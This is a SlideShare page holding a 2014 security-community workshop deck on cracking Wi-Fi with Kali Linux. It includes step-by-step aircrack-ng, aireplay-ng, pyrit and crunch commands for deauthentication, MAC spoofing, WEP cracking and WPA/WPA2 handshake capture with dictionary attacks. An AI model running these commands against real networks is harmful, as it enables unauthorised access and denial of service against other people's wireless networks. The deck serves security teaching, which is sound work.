SlideShare une entreprise Scribd logo

Wireless Cracking using Kali

n|u - The Open Security Community
n|u - The Open Security Community

null Bangalore Chapter - March 2014 Wireless Humla

Formation
1  sur  21
Télécharger pour lire hors ligne
Wireless Cracking Using Kali Asish Agarwalla
Terminology • SSID (Service Set Identifier) – An SSID is the Name of a Network • BSSID (Basic Service Set Identifier) – MAC address of the access point(AP) • Wireless Client
Monitor Mode • Monitor mode allows to monitor all traffic received from the wireless network without having associate with an access point or ad hoc network. • Create a monitor mode interface – airmon-ng start <wlan interface> – Ex: airmon-ng start wlan0
Hidden SSID • Passive Mode – Use Wireshark/airodump and wait for any client to connect to AP • airodump-ng --channel <channel> --bssid xx.xx.xx.xx.xx.xx <monitor interface> • Active Mode – Sending de-authentication packets using aireplay and Use Wireshark/airodump to monitor the traffic. – aireplay-ng –deauth 0 –a <bssid> <monitor mode interface> Probe Request and Probe Response packets will contains the SSID of the network.
Mac Filtering Bypass • Passive Mode – Use Wireshark/airodump and wait for any client to connect to AP – airodump-ng –channel <channel> --bssid xx.xx.xx.xx.xx.xx <monitor interface> • Active Mode – Force all connected client to authenticate again by sending de- authentication packets using aireplay and use Wireshark/ airodump to monitor the traffic – aireplay-ng –deauth 0 –a <bssid> <monitor mode interface> Once we find a whitelisted client's MAC address, we can spoof the MAC address of the client using the macchanger utility .
WEP (Wired Equivalent Privacy) Wireless Security • Two types of WEP authentication – Open System Authentication – Shared Key Authentication • Encrypt all network packages using – a stream-cipher (RC4) for confidentiality – a checksum (CRC-32) for integrity know as ICV • 64 Bit key = 24Bit IV + 40 Bit Key • 128 Bit Key = 24Bit IV + 104 Bit Key
WEP Encryption IV(24 Bit) Secret Key(40Bits)+ RC4 Algorithm Data ICV Cipher Text ICV
WEP Weakness • IV only 24-bits in WEP, IV must repeat after 2^24 or ~ 16.7M packets • IV sent in clear text • CRC-32 is not cryptographically secure to authenticate the message
WEP Cracking 1. Start Monitor Mode: airmon-ng start wlan0 2. Identify the target BSSID, SSID, Channel using airodump-ng: airodump-ng mon0 3. Configured monitor interface to listen on target channel: iwconfig mon0 channel <no> 4. Capture the packer using airodump: airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0 5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
WEP Cracking 6. Send deauth packet to a specific client: aireplay-ng -0 0 -a <BSSID> -c <mac of associated client > mon0 7. Fake authentication: aireplay -1 0 -e ssid -a <bssid> -h <attacker machine /spoof mac address> mon0 8. Generate data packets using Arp Replay: aireplay -3 -b <bssid> -h <attacker machine/connected client mac address> mon0 9. Crack : aircrack-ng <file.cap>
WEP Packet Decrypting 1. airdecap-ng -w <Shared Key> <captured_file.cap> 2. The decrypted files are stored in a file named captured_file-dec.cap 3. Open the captured_file-dec.cap using wireshark
WPA/WPA2 • WPA uses TKIP encryption algorithm • WPA2 mandatorily uses the AES-CCMP algorithm for encryption • WPA and WPA2 support PSK and EAP-based authentication • WPA/WPA2 PSK is vulnerable to a dictionary attack
WPA/WPA2 4 Ways Handshake
WPA/WPA2 4 Ways Handshake • Both Client and AP Generate Pairwise Master Key (PMK ) • PMK is derived using the WPA/WPA2 PSK passphrase supplied by the user, along with the SSID. The combination of both of these are sent through the Password Based Key Derivation Function (PBKDF2), which outputs the 256-bit shared key. • The AP sends a psuedo-randomly generated Anonce to the device . • The device generates its own psuedo-random Snonce. • The device then uses these two nonces, the MAC address of the AP, the MAC address of the device, and the PMK, to create a key called the Pairwise Temporal Key (PTK) which is 64 bytes, or 512 bits in length
WPA/WPA2 4 Ways Handshake • The device sends his snonce and a MIC to AP • Now AP will calculate the PTK using the same 5 parameter and compare its MIC(message integrity code) with client sent MIC • If both matches AP singed his anonce using PTK and send it along with key installation
WPA/WPA2 Dictionary Attack
WPA/WPA2 Cracking 1. Start Monitor Mode: airmon-ng start mon0 2. Identify the target BSSID, SSID, Channel using airodump-ng: airodump-ng mon0 3. Configured monitor interface to listen on target channel: iwconfig mon0 channel <no> 4. Capture the packer using airodump: airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0 5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0 6. Crack : aircrack-ng -w <password file> <file.cap>
Speeding up WPA/WPA2 PSK cracking with PMK • Generate PMK : Genpmk –f <password file> -d <output file> -s “SSID” • cowpatty –d <pmkfile> -s “SSID” -r <captured file> • Crack pyrit: pyrit -r <captured file> -i <pmk file> attack_cowpatty
Speeding up WPA/WPA2 PSK cracking with PMK • Import password to pyrit – pyrit -i <password file> import_passwords • Create a essid in pyrit – pyrit -e <ssid> creat_essid • Generate PMK – pyrit batch • Crack using PMK – pyrit -r <captured file> attack_db
Password File • crunch <min><max> <letter> -t <guess> • Ex: crunch 10 10 1234567890 -t 98767@@@@@
Thanks asishagarwalla@gmail.com 9379773260

Recommandé

How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngOpen Knowledge Nepal
 
Aircrack
AircrackAircrack
AircrackMuhammadHanzalah6
 
Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxMairajuddeen
 
WLAN Attacks and Protection
WLAN Attacks and ProtectionWLAN Attacks and Protection
WLAN Attacks and ProtectionChandrak Trivedi
 
Wi-fi Hacking
Wi-fi HackingWi-fi Hacking
Wi-fi HackingPaul Gillingwater, MBA
 
Analysis of web application penetration testing
Analysis of web application penetration testingAnalysis of web application penetration testing
Analysis of web application penetration testingEngr Md Yusuf Miah
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking Mehul Jariwala
 
Wireless Attacks
Wireless AttacksWireless Attacks
Wireless Attacksprimeteacher32
 

Recommandé

How to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngHow to hack wireless internet connections using aircrack-ng
How to hack wireless internet connections using aircrack-ngOpen Knowledge Nepal
 
Aircrack
AircrackAircrack
AircrackMuhammadHanzalah6
 
Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxMairajuddeen
 
WLAN Attacks and Protection
WLAN Attacks and ProtectionWLAN Attacks and Protection
WLAN Attacks and ProtectionChandrak Trivedi
 
Wi-fi Hacking
Wi-fi HackingWi-fi Hacking
Wi-fi HackingPaul Gillingwater, MBA
 
Analysis of web application penetration testing
Analysis of web application penetration testingAnalysis of web application penetration testing
Analysis of web application penetration testingEngr Md Yusuf Miah
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking Mehul Jariwala
 
Wireless Attacks
Wireless AttacksWireless Attacks
Wireless Attacksprimeteacher32
 
Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Mohammad Fareed
 
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityHow Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityAhmad Yar
 
Cracking WPA/WPA2 with Non-Dictionary Attacks
Cracking WPA/WPA2 with Non-Dictionary AttacksCracking WPA/WPA2 with Non-Dictionary Attacks
Cracking WPA/WPA2 with Non-Dictionary Attacksn|u - The Open Security Community
 
Vulnerability Assessment Report
Vulnerability Assessment ReportVulnerability Assessment Report
Vulnerability Assessment ReportHarshit Singh Bhatia
 
Wireless security using wpa2
Wireless security using wpa2Wireless security using wpa2
Wireless security using wpa2Tushar Anand
 
Getting Started With WebAuthn
Getting Started With WebAuthnGetting Started With WebAuthn
Getting Started With WebAuthnFIDO Alliance
 
WiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & DefenceWiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & DefencePrakashchand Suthar
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hackingarushi bhatnagar
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Fábio Afonso
 
Command injection
Command injectionCommand injection
Command injectionpenetration Tester
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
KRACK attack
KRACK attackKRACK attack
KRACK attackVadimDavydov3
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Fatih Ozavci
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injectionVi Tính Hoàng Nam
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentationMahmoud Ibra
 
remote-method-guesser - BHUSA2021 Arsenal
remote-method-guesser - BHUSA2021 Arsenal remote-method-guesser - BHUSA2021 Arsenal
remote-method-guesser - BHUSA2021 Arsenal Tobias Neitzel
 
Wpa vs Wpa2
Wpa vs Wpa2Wpa vs Wpa2
Wpa vs Wpa2Nzava Luwawa
 
WPA2
WPA2WPA2
WPA2Mshari Alabdulkarim
 

Contenu connexe

Tendances

Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Mohammad Fareed
 
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityHow Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityAhmad Yar
 
Wireless security using wpa2
Wireless security using wpa2Wireless security using wpa2
Wireless security using wpa2Tushar Anand
 
Getting Started With WebAuthn
Getting Started With WebAuthnGetting Started With WebAuthn
Getting Started With WebAuthnFIDO Alliance
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Fábio Afonso
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Fatih Ozavci
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentationMahmoud Ibra
 
remote-method-guesser - BHUSA2021 Arsenal
remote-method-guesser - BHUSA2021 Arsenal remote-method-guesser - BHUSA2021 Arsenal
remote-method-guesser - BHUSA2021 Arsenal Tobias Neitzel
 

Tendances (20)

Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018
 
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityHow Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
 
Cracking WPA/WPA2 with Non-Dictionary Attacks
Cracking WPA/WPA2 with Non-Dictionary AttacksCracking WPA/WPA2 with Non-Dictionary Attacks
Cracking WPA/WPA2 with Non-Dictionary Attacks
 
Vulnerability Assessment Report
Vulnerability Assessment ReportVulnerability Assessment Report
Vulnerability Assessment Report
 
Wireless security using wpa2
Wireless security using wpa2Wireless security using wpa2
Wireless security using wpa2
 
Getting Started With WebAuthn
Getting Started With WebAuthnGetting Started With WebAuthn
Getting Started With WebAuthn
 
WiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & DefenceWiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & Defence
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2
 
Command injection
Command injectionCommand injection
Command injection
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
KRACK attack
KRACK attackKRACK attack
KRACK attack
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Hacking SIP Like a Boss!
Hacking SIP Like a Boss!
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injection
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentation
 
remote-method-guesser - BHUSA2021 Arsenal
remote-method-guesser - BHUSA2021 Arsenal remote-method-guesser - BHUSA2021 Arsenal
remote-method-guesser - BHUSA2021 Arsenal
 

En vedette

802.11r Explained.
802.11r Explained. 802.11r Explained.
802.11r Explained. Ajay Gupta
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...RootedCON
 
New flaws in WPA-TKIP
New flaws in WPA-TKIPNew flaws in WPA-TKIP
New flaws in WPA-TKIPvanhoefm
 
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu ExploitationAhmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu Exploitationbarcamp.my
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security Hariraj Rathod
 
Cracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudCracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudFotios Lindiakos
 
Networking- OSI Layer Protocol Functions
Networking- OSI Layer Protocol FunctionsNetworking- OSI Layer Protocol Functions
Networking- OSI Layer Protocol FunctionsGayathri Kesavan
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksGreg Foss
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!edwardo
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentationMuhammad Zia
 
A Guide to 802.11 WiFi Security by US-CERT
A Guide to 802.11 WiFi Security by US-CERTA Guide to 802.11 WiFi Security by US-CERT
A Guide to 802.11 WiFi Security by US-CERTDavid Sweigert
 

En vedette (15)

Wpa vs Wpa2
Wpa vs Wpa2Wpa vs Wpa2
Wpa vs Wpa2
 
WPA2
WPA2WPA2
WPA2
 
802.11r Explained.
802.11r Explained. 802.11r Explained.
802.11r Explained.
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
 
New flaws in WPA-TKIP
New flaws in WPA-TKIPNew flaws in WPA-TKIP
New flaws in WPA-TKIP
 
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu ExploitationAhmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security
 
Cracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudCracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloud
 
Networking- OSI Layer Protocol Functions
Networking- OSI Layer Protocol FunctionsNetworking- OSI Layer Protocol Functions
Networking- OSI Layer Protocol Functions
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot Attacks
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!
 
Ch06 Wireless Network Security
Ch06 Wireless Network SecurityCh06 Wireless Network Security
Ch06 Wireless Network Security
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentation
 
A Guide to 802.11 WiFi Security by US-CERT
A Guide to 802.11 WiFi Security by US-CERTA Guide to 802.11 WiFi Security by US-CERT
A Guide to 802.11 WiFi Security by US-CERT
 

Similaire à Wireless Cracking using Kali

Wireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way HandshakeWireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way Handshakedata68
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_kRama Krishna M
 
cracking WPA/WPA2 encrypted Wi-fi network using backtrack
cracking WPA/WPA2 encrypted Wi-fi network using backtrackcracking WPA/WPA2 encrypted Wi-fi network using backtrack
cracking WPA/WPA2 encrypted Wi-fi network using backtrackBidhan Ghimire
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksHammam Samara
 
Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Shrobon Biswas
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentestingMihir Shah
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networksMaghan Das
 
Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Amazon Web Services
 
Nexus 1000v part ii
Nexus 1000v part iiNexus 1000v part ii
Nexus 1000v part iiKrunal Shah
 
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity
Creating Your Virtual Data Center: VPC Fundamentals and ConnectivityCreating Your Virtual Data Center: VPC Fundamentals and Connectivity
Creating Your Virtual Data Center: VPC Fundamentals and ConnectivityAmazon Web Services
 
Konfigurasi DHCP Nano Station
Konfigurasi DHCP Nano StationKonfigurasi DHCP Nano Station
Konfigurasi DHCP Nano StationIbnu Syina
 
4 wifi security
4 wifi security4 wifi security
4 wifi securityal-sari7
 
VM Console Enhancements
VM Console EnhancementsVM Console Enhancements
VM Console EnhancementsShapeBlue
 
VPC Fundamentals & Connectivity - Pop-up Loft Tel Aviv
VPC Fundamentals & Connectivity - Pop-up Loft Tel AvivVPC Fundamentals & Connectivity - Pop-up Loft Tel Aviv
VPC Fundamentals & Connectivity - Pop-up Loft Tel AvivAmazon Web Services
 
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...Amazon Web Services
 
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...Jiunn-Jer Sun
 

Similaire à Wireless Cracking using Kali (20)

Wireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way HandshakeWireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way Handshake
 
Wifi cracking
Wifi crackingWifi cracking
Wifi cracking
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_k
 
cracking WPA/WPA2 encrypted Wi-fi network using backtrack
cracking WPA/WPA2 encrypted Wi-fi network using backtrackcracking WPA/WPA2 encrypted Wi-fi network using backtrack
cracking WPA/WPA2 encrypted Wi-fi network using backtrack
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
 
Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study )
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentesting
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networks
 
Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)
 
Nexus 1000v part ii
Nexus 1000v part iiNexus 1000v part ii
Nexus 1000v part ii
 
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity
Creating Your Virtual Data Center: VPC Fundamentals and ConnectivityCreating Your Virtual Data Center: VPC Fundamentals and Connectivity
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity
 
Konfigurasi DHCP Nano Station
Konfigurasi DHCP Nano StationKonfigurasi DHCP Nano Station
Konfigurasi DHCP Nano Station
 
4 wifi security
4 wifi security4 wifi security
4 wifi security
 
1-300-206 (SENSS)=Firewall (642-618)
1-300-206 (SENSS)=Firewall (642-618) 1-300-206 (SENSS)=Firewall (642-618)
1-300-206 (SENSS)=Firewall (642-618)
 
VM Console Enhancements
VM Console EnhancementsVM Console Enhancements
VM Console Enhancements
 
Wifi hacking
Wifi hackingWifi hacking
Wifi hacking
 
EMEA Airheads- Manage Devices at Branch Office (BOC)
EMEA Airheads- Manage Devices at Branch Office (BOC)EMEA Airheads- Manage Devices at Branch Office (BOC)
EMEA Airheads- Manage Devices at Branch Office (BOC)
 
VPC Fundamentals & Connectivity - Pop-up Loft Tel Aviv
VPC Fundamentals & Connectivity - Pop-up Loft Tel AvivVPC Fundamentals & Connectivity - Pop-up Loft Tel Aviv
VPC Fundamentals & Connectivity - Pop-up Loft Tel Aviv
 
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...
 
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...
 

Plus de n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

Plus de n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Dernier

Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphThiyagu K
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactPECB
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdfQucHHunhnh
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajanpragatimahajan3
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformChameera Dedduwage
 
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...PsychoTech Services
 
Software Engineering Methodologies (overview)
